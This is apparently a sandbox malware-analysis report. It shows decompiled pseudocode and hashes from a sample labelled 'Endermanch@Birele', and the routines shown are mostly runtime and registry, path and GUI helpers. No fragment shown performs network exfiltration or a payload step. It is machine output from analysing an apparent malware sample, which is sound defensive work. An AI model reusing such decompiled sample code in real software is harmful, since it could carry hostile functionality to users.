                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 2796650324-0
                                                                                                          • Opcode ID: 2ec057aae25fb80058faf0b953f7a0de4faf8577425390b8435543846915edec
                                                                                                          • Instruction ID: 11fe788d9dea6a66111706c709e2223d29c407fabf132aa1ea3f239ebfa6af2c
                                                                                                          • Opcode Fuzzy Hash: 2ec057aae25fb80058faf0b953f7a0de4faf8577425390b8435543846915edec
                                                                                                          • Instruction Fuzzy Hash: 6AE06DB2A002108FDB10EE58C8C1A4733D8AF48754F044966EF54EF38AD3B8DD208BD4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 75%
                                                                                                          			E0040695C(intOrPtr* __eax, void* __ebx) {
                                                                                                          				intOrPtr* _t10;
                                                                                                          
                                                                                                          				_t15 = __eax;
                                                                                                          				if(__eax != 0) {
                                                                                                          					_t10 = __eax;
                                                                                                          					 *0x4198a4 =  *0x4198a4 + 1;
                                                                                                          					 *0x4198a8 =  *__eax; // executed
                                                                                                          					E00405EB8( *__eax); // executed
                                                                                                          					asm("jecxz 0xffffffed");
                                                                                                          					asm("jecxz 0x7");
                                                                                                          					return E00406910(_t10, _t15);
                                                                                                          				}
                                                                                                          				return __eax;
                                                                                                          			}




                                                                                                          0x0040695c
                                                                                                          0x0040695f
                                                                                                          0x00406962
                                                                                                          0x00406963
                                                                                                          0x0040696b
                                                                                                          0x00406971
                                                                                                          0x0040698b
                                                                                                          0x00406991
                                                                                                          0x00000000
                                                                                                          0x00406993
                                                                                                          0x00406998

                                                                                                          APIs
                                                                                                          • WaitMessage.USER32(?,00417277), ref: 00406978
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 1058943002-0
                                                                                                          • Opcode ID: f6dd98189bb2c4f1e5a5f6c7c2be82427262c139f23c65f34d1e93f07f2e28a3
                                                                                                          • Instruction ID: ba5a4919db89a7eb7d77e4057884912dd4fa938e0d5046d6cb8b54f6dfa4b5c3
                                                                                                          • Opcode Fuzzy Hash: f6dd98189bb2c4f1e5a5f6c7c2be82427262c139f23c65f34d1e93f07f2e28a3
                                                                                                          • Instruction Fuzzy Hash: 0DE04FB41140514EC701BF6D85E0A5A3790DF4330979108BFE147BB6E2C63D6851CB6E
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E004081C0(void* __eax, struct tagSIZE* __ecx, int __edx, void* __edi) {
                                                                                                          				int _t12;
                                                                                                          				int _t14;
                                                                                                          				void* _t17;
                                                                                                          				void* _t18;
                                                                                                          				CHAR** _t19;
                                                                                                          
                                                                                                          				_t14 = __edx;
                                                                                                          				_t18 = __eax;
                                                                                                          				 *_t19 = E0040602C(_t14, __ecx, E00405BD4(_t17, __edx), __edi);
                                                                                                          				E00406CEC(_t18, 9);
                                                                                                          				_t12 = GetTextExtentPoint32A( *(_t18 + 0x1c),  *_t19, _t14, __ecx); // executed
                                                                                                          				return _t12;
                                                                                                          			}








                                                                                                          0x004081c0
                                                                                                          0x004081c1
                                                                                                          0x004081cf
                                                                                                          0x004081d6
                                                                                                          0x004081de
                                                                                                          0x004081e4

                                                                                                          APIs
                                                                                                          • GetTextExtentPoint32A.GDI32(00000000,?,00000009,00000000), ref: 004081DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExtentPoint32Text
                                                                                                          • String ID:
                                                                                                          • API String ID: 223599850-0
                                                                                                          • Opcode ID: b7f3194463598e5197048551cbbb6afac588e3f5a9e087ae257333be8b6ad67f
                                                                                                          • Instruction ID: 12c6340e1fd5c880730e9ebfcd5e47dd65edd9fea8feb467d6a2bf18329bcbe1
                                                                                                          • Opcode Fuzzy Hash: b7f3194463598e5197048551cbbb6afac588e3f5a9e087ae257333be8b6ad67f
                                                                                                          • Instruction Fuzzy Hash: 4AD0C960145A216DEA537721AC02D6F2568EF40708B02442EB0417A0C3DE79A85245E9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00415519() {
                                                                                                          				long _t7;
                                                                                                          				void* _t9;
                                                                                                          
                                                                                                          				E004151F0( *((intOrPtr*)(_t9 - 4)),  *((intOrPtr*)(_t9 - 0x18)));
                                                                                                          				_t7 = RegCloseKey( *(_t9 - 0x1c)); // executed
                                                                                                          				return _t7;
                                                                                                          			}





                                                                                                          0x00415505
                                                                                                          0x0041550e
                                                                                                          0x00415513

                                                                                                          APIs
                                                                                                          • RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: b4c422e474a5f38b5842ab7dac326bb470f1e50f44f6a73a73a9026f168c3500
                                                                                                          • Instruction ID: 6f43521391a9dfed9570ded51f65e1e9e926f8e3cfe4b526732f07f7c56793f1
                                                                                                          • Opcode Fuzzy Hash: b4c422e474a5f38b5842ab7dac326bb470f1e50f44f6a73a73a9026f168c3500
                                                                                                          • Instruction Fuzzy Hash: 10C04C74D00505EBCF00EB99C4469EF7374AB88314BD04956A515A3101C63DAD855B94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00415C6C() {
                                                                                                          				long _t3;
                                                                                                          				void* _t4;
                                                                                                          
                                                                                                          				_t3 = RegCloseKey( *(_t4 - 0x24)); // executed
                                                                                                          				return _t3;
                                                                                                          			}





                                                                                                          0x00415c61
                                                                                                          0x00415c66

                                                                                                          APIs
                                                                                                          • RegCloseKey.ADVAPI32(?,00415C6E,00000000,00415C8A,?,00000000,00415CA8,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: 7c91f4545401d51c88c786edccc3c1c4797f8067341a0bac21c0f15ec479098c
                                                                                                          • Instruction ID: 61b5526057950a7de15b5d5c439d35017df66950e57150426ceb1a10c44fc0e9
                                                                                                          • Opcode Fuzzy Hash: 7c91f4545401d51c88c786edccc3c1c4797f8067341a0bac21c0f15ec479098c
                                                                                                          • Instruction Fuzzy Hash: D4A02238A00B00EBCF00EFE080088EE22A8AA8C3003E00C82F008F2000E03FEE020A28
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 53%
                                                                                                          			E00415878(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				intOrPtr _v20;
                                                                                                          				char _v21;
                                                                                                          				void* _t50;
                                                                                                          				void* _t67;
                                                                                                          				intOrPtr _t84;
                                                                                                          				intOrPtr _t89;
                                                                                                          				void* _t92;
                                                                                                          				void* _t94;
                                                                                                          				void* _t95;
                                                                                                          				intOrPtr _t96;
                                                                                                          
                                                                                                          				_t94 = _t95;
                                                                                                          				_t96 = _t95 + 0xffffffec;
                                                                                                          				_t92 = __ecx;
                                                                                                          				_v8 = __edx;
                                                                                                          				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                          				E004151F0( *((intOrPtr*)(_a4 - 4)), __eax);
                                                                                                          				_push(_t94);
                                                                                                          				_push(0x41598a);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t96;
                                                                                                          				_t67 = E00415644( *((intOrPtr*)(_a4 - 4)), __ecx, __eflags);
                                                                                                          				_t98 = _t67;
                                                                                                          				if(_t67 <= 0) {
                                                                                                          					__eflags = 0;
                                                                                                          					_pop(_t84);
                                                                                                          					 *[fs:eax] = _t84;
                                                                                                          					_push(E00415991);
                                                                                                          					return E004151F0( *((intOrPtr*)(_a4 - 4)), _v12);
                                                                                                          				} else {
                                                                                                          					_v20 = E00409720(_t67, _t98);
                                                                                                          					_push(_t94);
                                                                                                          					_push(0x415967);
                                                                                                          					_push( *[fs:eax]);
                                                                                                          					 *[fs:eax] = _t96;
                                                                                                          					_t50 = E00415700( *((intOrPtr*)(_a4 - 4)), _v20, _t92,  &_v21, _t67); // executed
                                                                                                          					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                          					E004151F0( *((intOrPtr*)(_a4 - 4)), _v8);
                                                                                                          					_push(_t94);
                                                                                                          					_push(0x41594a);
                                                                                                          					_push( *[fs:eax]);
                                                                                                          					 *[fs:eax] = _t96;
                                                                                                          					E00415698( *((intOrPtr*)(_a4 - 4)), _v20, _t92, _t98, 0, _t50); // executed
                                                                                                          					_pop(_t89);
                                                                                                          					 *[fs:eax] = _t89;
                                                                                                          					_push(E00415951);
                                                                                                          					return E004151F0( *((intOrPtr*)(_a4 - 4)), _v16);
                                                                                                          				}
                                                                                                          			}
















                                                                                                          0x00415879
                                                                                                          0x0041587b
                                                                                                          0x00415880
                                                                                                          0x00415882
                                                                                                          0x0041588e
                                                                                                          0x00415898
                                                                                                          0x0041589f
                                                                                                          0x004158a0
                                                                                                          0x004158a5
                                                                                                          0x004158a8
                                                                                                          0x004158b8
                                                                                                          0x004158ba
                                                                                                          0x004158bc
                                                                                                          0x0041596e
                                                                                                          0x00415970
                                                                                                          0x00415973
                                                                                                          0x00415976
                                                                                                          0x00415989
                                                                                                          0x004158c2
                                                                                                          0x004158c9
                                                                                                          0x004158ce
                                                                                                          0x004158cf
                                                                                                          0x004158d4
                                                                                                          0x004158d7
                                                                                                          0x004158ea
                                                                                                          0x004158fa
                                                                                                          0x00415906
                                                                                                          0x0041590d
                                                                                                          0x0041590e
                                                                                                          0x00415913
                                                                                                          0x00415916
                                                                                                          0x00415929
                                                                                                          0x00415930
                                                                                                          0x00415933
                                                                                                          0x00415936
                                                                                                          0x00415949
                                                                                                          0x00415949

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Query
                                                                                                          • String ID:
                                                                                                          • API String ID: 4255345937-0
                                                                                                          • Opcode ID: 3b7714f68e251e3fedeaa7c8efeb0d66ef19a9b3d83813ead7222de35bf33433
                                                                                                          • Instruction ID: aa29b8fc898220e5a21962ed39db224a6223b180fe3c3ef9623e4e14b483a44e
                                                                                                          • Opcode Fuzzy Hash: 3b7714f68e251e3fedeaa7c8efeb0d66ef19a9b3d83813ead7222de35bf33433
                                                                                                          • Instruction Fuzzy Hash: 373149B8710A08EFC701DF59C8958DEBBF9EB8C720B5185A6F8449B311D738EE41CA94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 31ae8cb3ff25d1a0ae920620ab36e550f4024e133711e052186b9dc977e7af5d
                                                                                                          • Instruction ID: baba3774e5db9170fcae5dab086b75067e711751db4508beddb64815688ff0af
                                                                                                          • Opcode Fuzzy Hash: 31ae8cb3ff25d1a0ae920620ab36e550f4024e133711e052186b9dc977e7af5d
                                                                                                          • Instruction Fuzzy Hash: 79F052B22006016FD3218F4FAED1863BF9CF789320305883BF408E37A0CA76AD10D968
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0041566C(void* __eax, void* __ecx, void* __edx) {
                                                                                                          				void* _t8;
                                                                                                          				void* _t9;
                                                                                                          
                                                                                                          				_t9 = __eax;
                                                                                                          				_t4 = E00403C48(__ecx) + 1;
                                                                                                          				_t8 = E00415698(_t9, E00403E38(__ecx), __edx, E00403C48(__ecx) + 1, 1, _t4); // executed
                                                                                                          				return _t8;
                                                                                                          			}





                                                                                                          0x00415673
                                                                                                          0x0041567c
                                                                                                          0x0041568d
                                                                                                          0x00415695

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value
                                                                                                          • String ID:
                                                                                                          • API String ID: 3702945584-0
                                                                                                          • Opcode ID: e83d0740145b18ed4bbaef337b443c8d04dc3b66f0d1e0c42e1018c2eb65bab3
                                                                                                          • Instruction ID: 35edae831e217ae032e83d6b7b8a5c73fe710539674c7efb9bbfab6b49e64099
                                                                                                          • Opcode Fuzzy Hash: e83d0740145b18ed4bbaef337b443c8d04dc3b66f0d1e0c42e1018c2eb65bab3
                                                                                                          • Instruction Fuzzy Hash: 55D0C9623016202BA204656F1C41AAE85CD8BC9A6A754003BB50DE7392DDA98D4602A8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 37%
                                                                                                          			E004083E0(void* __eax) {
                                                                                                          
                                                                                                          				asm("jecxz 0x4");
                                                                                                          				return  *((intOrPtr*)(__eax + 0x1c));
                                                                                                          			}



                                                                                                          0x004083e3
                                                                                                          0x004083e6

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 90056a2d105b484e4b62bf6eae47fac5bd9bb627b31bc4d49509141f827bb4b7
                                                                                                          • Instruction ID: 20e76f15aff949347372c085140b88abdc78033378d7e2a1b7db157466d2375d
                                                                                                          • Opcode Fuzzy Hash: 90056a2d105b484e4b62bf6eae47fac5bd9bb627b31bc4d49509141f827bb4b7
                                                                                                          • Instruction Fuzzy Hash: E4D0C23020854102DB85AB29C4C06072A846F90319B4044FEA8826B2C3CFBCC442AB09
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 37%
                                                                                                          			E00402638(void* __eax) {
                                                                                                          				void* _t3;
                                                                                                          				void* _t6;
                                                                                                          
                                                                                                          				if(__eax <= 0) {
                                                                                                          					_t6 = 0;
                                                                                                          				} else {
                                                                                                          					_t3 =  *0x41803c(); // executed
                                                                                                          					_t6 = _t3;
                                                                                                          					if(_t6 == 0) {
                                                                                                          						E00402720(1);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t6;
                                                                                                          			}





                                                                                                          0x0040263b
                                                                                                          0x00402652
                                                                                                          0x0040263d
                                                                                                          0x0040263d
                                                                                                          0x00402643
                                                                                                          0x00402647
                                                                                                          0x0040264b
                                                                                                          0x0040264b
                                                                                                          0x00402647
                                                                                                          0x00402657

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 33ebc5f31b1035feecc87c6896fb90885c8dc0f5c9fcac9c4b338f4b41c03924
                                                                                                          • Instruction ID: 1058be6bf19a490c087f8d279ed9db65ed44d515ba0b49c3e4970b41d5a761d7
                                                                                                          • Opcode Fuzzy Hash: 33ebc5f31b1035feecc87c6896fb90885c8dc0f5c9fcac9c4b338f4b41c03924
                                                                                                          • Instruction Fuzzy Hash: 43C08CB03013138B9B003EEA0BEC01351882B38284700087FAD04E23C2DEFAC80E663A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 16%
                                                                                                          			E00406250(intOrPtr* __eax) {
                                                                                                          				void* _t5;
                                                                                                          
                                                                                                          				asm("jecxz 0xc");
                                                                                                          				_push( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x44)) + 0x1c)));
                                                                                                          				asm("lodsd"); // executed
                                                                                                          				_t5 = E00405EB8(__eax); // executed
                                                                                                          				asm("loop 0xfffffff8");
                                                                                                          				return _t5;
                                                                                                          			}




                                                                                                          0x0040625a
                                                                                                          0x0040625c
                                                                                                          0x0040625d
                                                                                                          0x0040625e
                                                                                                          0x00406264
                                                                                                          0x00406267

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9adaa953d2fb6ffaa2adea4b28e2ca628e519e7a798391335b37bc44be81126c
                                                                                                          • Instruction ID: 8839e98bfc74b6f14d3acc62b2fc79103dca72dfbcbd23ff51be8a489eebff5a
                                                                                                          • Opcode Fuzzy Hash: 9adaa953d2fb6ffaa2adea4b28e2ca628e519e7a798391335b37bc44be81126c
                                                                                                          • Instruction Fuzzy Hash: E5C012368089208BCA24BE00A00089373A89A443203460AEFA8433B3A18934BD818AD9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040675C(void* __eax, void* __edx) {
                                                                                                          				void* _t7;
                                                                                                          
                                                                                                          				_t7 = __eax;
                                                                                                          				if(__edx == 0) {
                                                                                                          					 *((intOrPtr*)(__eax + 0x6c)) = 0x405c44;
                                                                                                          				} else {
                                                                                                          					 *((intOrPtr*)(__eax + 0x6c)) = E00406520;
                                                                                                          					E00407668(__eax); // executed
                                                                                                          				}
                                                                                                          				return _t7;
                                                                                                          			}




                                                                                                          0x0040675d
                                                                                                          0x00406761
                                                                                                          0x00406773
                                                                                                          0x00406763
                                                                                                          0x00406763
                                                                                                          0x0040676c
                                                                                                          0x0040676c
                                                                                                          0x0040677d

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 25da475608c9d6fd49277d8d03256b60ac927d89219a6e8d567fe6741888ceee
                                                                                                          • Instruction ID: 423c99772fe2ad1ba25f4678ec601e2d52d324344adf6e1a132a318e02234cac
                                                                                                          • Opcode Fuzzy Hash: 25da475608c9d6fd49277d8d03256b60ac927d89219a6e8d567fe6741888ceee
                                                                                                          • Instruction Fuzzy Hash: 25C0127520970146DB005E2918C09022A54960035C311807B64026F38AC37EC8189F4D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00403718(intOrPtr __eax, intOrPtr __edx) {
                                                                                                          				void* _t6;
                                                                                                          				intOrPtr _t7;
                                                                                                          
                                                                                                          				_t7 = __edx;
                                                                                                          				 *0x419014 = 0x401168;
                                                                                                          				 *0x419018 = 0x401170;
                                                                                                          				 *0x419638 = __eax;
                                                                                                          				 *0x41963c = 0;
                                                                                                          				 *0x419640 = __edx;
                                                                                                          				_t1 = _t7 + 4; // 0x400000
                                                                                                          				 *0x41902c =  *_t1;
                                                                                                          				E00403610();
                                                                                                          				 *0x419034 = 0; // executed
                                                                                                          				_t6 = E004036B8(); // executed
                                                                                                          				return _t6;
                                                                                                          			}





                                                                                                          0x00403718
                                                                                                          0x00403718
                                                                                                          0x00403722
                                                                                                          0x0040372c
                                                                                                          0x00403733
                                                                                                          0x00403738
                                                                                                          0x0040373e
                                                                                                          0x00403741
                                                                                                          0x00403746
                                                                                                          0x0040374b
                                                                                                          0x00403752
                                                                                                          0x00403757

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a01a9f2854f1b41ece7997731a594c06cffd82828fc5eeb8b6439c4a01c67717
                                                                                                          • Instruction ID: 17366c64c2580302be042c683cb77b59e5dce16d6f5a0bf814aac77971e7d171
                                                                                                          • Opcode Fuzzy Hash: a01a9f2854f1b41ece7997731a594c06cffd82828fc5eeb8b6439c4a01c67717
                                                                                                          • Instruction Fuzzy Hash: 7CE0E2B48012008EC714EF76AAA42817FE0A70C304B41C97AD1089B371D3388E44CFAD
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 53%
                                                                                                          			E004048F8(char* __eax, intOrPtr __edx) {
                                                                                                          				char* _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				struct _WIN32_FIND_DATAA _v334;
                                                                                                          				char _v595;
                                                                                                          				void* _t45;
                                                                                                          				char* _t54;
                                                                                                          				char* _t64;
                                                                                                          				void* _t83;
                                                                                                          				intOrPtr* _t84;
                                                                                                          				char* _t90;
                                                                                                          				struct HINSTANCE__* _t91;
                                                                                                          				char* _t93;
                                                                                                          				void* _t94;
                                                                                                          				char* _t95;
                                                                                                          				void* _t96;
                                                                                                          
                                                                                                          				_v12 = __edx;
                                                                                                          				_v8 = __eax;
                                                                                                          				_v16 = _v8;
                                                                                                          				_t91 = GetModuleHandleA("kernel32.dll");
                                                                                                          				if(_t91 == 0) {
                                                                                                          					L4:
                                                                                                          					if( *_v8 != 0x5c) {
                                                                                                          						_t93 = _v8 + 2;
                                                                                                          						goto L10;
                                                                                                          					} else {
                                                                                                          						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                                                          							_t95 = E004048E4(_v8 + 2);
                                                                                                          							if( *_t95 != 0) {
                                                                                                          								_t14 = _t95 + 1; // 0x1
                                                                                                          								_t93 = E004048E4(_t14);
                                                                                                          								if( *_t93 != 0) {
                                                                                                          									L10:
                                                                                                          									_t83 = _t93 - _v8;
                                                                                                          									_push(_t83 + 1);
                                                                                                          									_push(_v8);
                                                                                                          									_push( &_v595);
                                                                                                          									L00401200();
                                                                                                          									while( *_t93 != 0) {
                                                                                                          										_t90 = E004048E4(_t93 + 1);
                                                                                                          										_t45 = _t90 - _t93;
                                                                                                          										if(_t45 + _t83 + 1 <= 0x105) {
                                                                                                          											_push(_t45 + 1);
                                                                                                          											_push(_t93);
                                                                                                          											_push( &(( &_v595)[_t83]));
                                                                                                          											L00401200();
                                                                                                          											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                                                          											if(_t94 != 0xffffffff) {
                                                                                                          												FindClose(_t94);
                                                                                                          												_t54 =  &(_v334.cFileName);
                                                                                                          												_push(_t54);
                                                                                                          												L00401208();
                                                                                                          												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                                                          													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                                                          													_push(0x105 - _t83 - 1);
                                                                                                          													_push( &(_v334.cFileName));
                                                                                                          													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                                                          													L00401200();
                                                                                                          													_t64 =  &(_v334.cFileName);
                                                                                                          													_push(_t64);
                                                                                                          													L00401208();
                                                                                                          													_t83 = _t83 + _t64 + 1;
                                                                                                          													_t93 = _t90;
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          											}
                                                                                                          										}
                                                                                                          										goto L17;
                                                                                                          									}
                                                                                                          									_push(_v12);
                                                                                                          									_push( &_v595);
                                                                                                          									_push(_v8);
                                                                                                          									L00401200();
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				} else {
                                                                                                          					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                                                          					if(_t84 == 0) {
                                                                                                          						goto L4;
                                                                                                          					} else {
                                                                                                          						_push(0x105);
                                                                                                          						_push( &_v595);
                                                                                                          						_push(_v8);
                                                                                                          						if( *_t84() == 0) {
                                                                                                          							goto L4;
                                                                                                          						} else {
                                                                                                          							_push(_v12);
                                                                                                          							_push( &_v595);
                                                                                                          							_push(_v8);
                                                                                                          							L00401200();
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				L17:
